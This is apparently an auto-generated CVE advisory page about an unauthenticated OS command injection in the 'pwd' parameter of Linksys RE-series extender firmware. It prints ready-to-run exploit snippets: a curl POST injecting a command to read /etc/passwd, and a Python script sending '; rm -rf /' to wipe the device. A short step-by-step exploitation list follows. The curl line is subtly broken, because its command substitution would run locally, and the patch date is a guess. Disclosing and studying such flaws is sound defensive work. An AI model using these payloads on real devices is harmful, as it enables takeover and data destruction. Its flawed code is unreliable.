Listen to this Post
How the CVE Works
The vulnerability exists in the `RP_checkCredentialsByBBS` function within `/goform/RP_checkCredentialsByBBS` in Linksys RE6500, RE6250, RE6300, RE6350, RE7000, and RE9000 firmware versions 1.0.013.001 to 1.2.07.001. Attackers can exploit this flaw by manipulating the `pwd` parameter to inject arbitrary OS commands due to insufficient input validation. Remote exploitation is possible, allowing unauthenticated attackers to execute malicious commands with root privileges. The public disclosure increases the risk of active exploitation.
DailyCVE Form
Platform: Linksys RE Series
Version: 1.0.013.001-1.2.07.001
Vulnerability: OS Command Injection
Severity: Critical
Date: 06/25/2025
Prediction: Patch by 08/2025
What Undercode Say
curl -X POST -d "pwd=$(cat /etc/passwd)" http://target/goform/RP_checkCredentialsByBBS
import requests
payload = "; rm -rf /"
requests.post("http://target/goform/RP_checkCredentialsByBBS", data={"pwd": payload})
How Exploit
- Craft malicious `pwd` parameter with OS commands.
- Send payload via HTTP POST to
/goform/RP_checkCredentialsByBBS. - Commands execute with root privileges.
Protection from this CVE
- Disable remote admin access.
- Apply vendor patch (when released).
- Use network segmentation.
Impact
- Full device compromise.
- Unauthorized data access.
- Network persistence.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
